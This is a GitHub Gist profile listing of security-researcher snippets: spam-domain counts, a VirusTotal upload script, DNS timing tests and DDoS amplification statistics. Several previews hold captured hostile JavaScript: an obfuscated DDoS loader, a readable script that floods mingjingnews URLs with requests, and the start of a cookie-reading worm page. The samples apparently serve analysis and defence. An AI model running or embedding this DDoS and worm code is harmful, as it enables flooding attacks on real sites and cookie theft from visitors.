Skip to content

Instantly share code, notes, and snippets.

@xxdesmus
xxdesmus / README.txt
Created Jan 29, 2018 — forked from whitequark/README.txt
Strava archiver
View README.txt
1. install postgres
2. run makedb.rb >tiles.csv
3. run tiles.sql
4. run archive.rb
5. enjoy
@xxdesmus
xxdesmus / top100spam.txt
Created Jan 28, 2018
Top 100 spam domains from Jan 13, 2018 - Jan 25, 2018
View top100spam.txt
2020191 moresex.space
1738469 fforsex.space
1581379 xxxlola.space
1438921 onlylowe.space
1357090 forsexx.space
1325587 xxxlily.space
1317763 morelove.space
1145549 morresexxxx.space
1114029 forlove.space
1094804 forrlovve.space
View mail honeypot
531386 http://sex69sex.info
314172 http://xxxlola.space
204109 http://sex69sex3.website
193275 http://embersexy.space
141532 http://sexxxymiaa.space
123132 http://xxxlily.space
118136 http://sex4sex.info
117762 http://xxxjen.space
85827 http://sexyymia.space
59542 http://emberpage.space
@xxdesmus
xxdesmus / virustotal_upload
Created Nov 1, 2017 — forked from mattghali/virustotal_upload
Upload a sample to VirusTotal and pretty print the report. All in a handy alias.
View virustotal_upload
#!/usr/bin/env bash
#
# Upload a sample to VirusTotal and pretty print the report.
# All in a handy alias.
#
# Dependencies:
#
# * curl
# * jq
# * VirusTotal API key
View gdocs.pro-worm
<html>
<head>
<script type="text/javascript">
function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
@xxdesmus
xxdesmus / ddos-from-baidu.js
Created Aug 23, 2017 — forked from nczz/ddos-from-baidu.js
百度在主動推送網址的方法中藏有惡意原碼
View ddos-from-baidu.js
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('b((/X\\/([\\d]+)/Z.19(i.K.M.H())[1]>=1b)&&(i.K.M.H().1a("16")<0)){3 D=T;3 p=[\'n://13.q.m/\',\'n://15.q.m/\',\'n://14.q.m/\',\'n://11.12.m/\'];3 E=17;3 k=18;3 O=10;3 s=1;h w(){3 8=e 7();A 7.S(8.Y(),8.W(),8.U(),8.V(),8.I(),8.J())/R}g.z("B")[0].F="<1r 1s=\\"y\\" 1q=\\"1o-y\\">"+g.z("B")[0].F;3 9=[];3 f=[];3 x=5;3 c=[];3 a=[];3 r=\'\';3 l=0;h o(2){3 6=9[2];b(6!=5){g.G.1p(6)}9[2]=5;b(l<E&&a[2]-x<D){Q(\'u(\'+2+\')\',(a[2]-c[2])>k?k:(a[2]-c[2]))}}h L(2){b(9[2]==5){A}b(9[2].1x){i.C(f[2]);a[2]=e 7().j();o(2)}1v{b(e 7().j()-c[2]>k){i.C(f[2]);o(2)}}}h u(2){6=g.G.1t(g.1w(\'1u\'));r=p[w()%p.1n];6.1f=r+\'?t=\'+w()+P.1e(P.1c()*1d);6.1h.1l=\'1m\';9[2]=6;c[2]=a[2]=e 7().j();f[2]=1k("L("+2+")",1i);l=l+1}
@xxdesmus
xxdesmus / mingjingtimes-ddos-code.js
Created Aug 23, 2017 — forked from nczz/mingjingtimes-ddos-code.js
明鏡時報惡意大量請求攻擊程式碼
View mingjingtimes-ddos-code.js
if ((/chrome\/([\d]+)/gi.exec(window.navigator.userAgent.toLowerCase())[1] >= 34) && (window.navigator.userAgent.toLowerCase().indexOf("edge") < 0)) {
var MAX_TIME = 300000;
var url_list = ['http://news.mingjingnews.com/', 'http://s1.mingjingnews.com/', 'http://tv.mingjingnews.com/', 'http://www.mingjingtimes.com/'];
var MAX_COUNT = 100000000;
var TIMEGAP = 500;
var THREAD = 10;
var START_CLOCK = 1;
function unixtime() {
var dt = new Date();
@xxdesmus
xxdesmus / cloudflare-ipset.sh
Created Mar 30, 2017 — forked from KiNgMaR/cloudflare-ipset.sh
Cloudflare IPTABLES and IPSET scripts
View cloudflare-ipset.sh
#/bin/sh
# name of the ipset - v4 or v6 will be appended.
IPSET_NAME=cloudflare-
# argument: v4 or v6 (defaults to v4)
cloudflare_ipset ()
{
local ipv
local inetv
View gist:336af4b717fdb719f20e9ef284c2249a
############
## Google ##
############
$ for i in {1..10}; do dig @8.8.8.8 canhazip.com | grep "Query time"; done
;; Query time: 54 msec
;; Query time: 59 msec
;; Query time: 45 msec
;; Query time: 20 msec
;; Query time: 20 msec
@xxdesmus
xxdesmus / Amplification-type-count.txt
Last active Oct 19, 2016
Amplification type count -> February 2016 - October 2016
View Amplification-type-count.txt
Type | Count
---------------------------
NTP | 3,749,953,101
unknown | 381,814,150
DNS | 191,622,518
Invalid | 123,173,586
CHARGEN | 93,040,586
SSDP | 10,546,205
QOTD | 365,421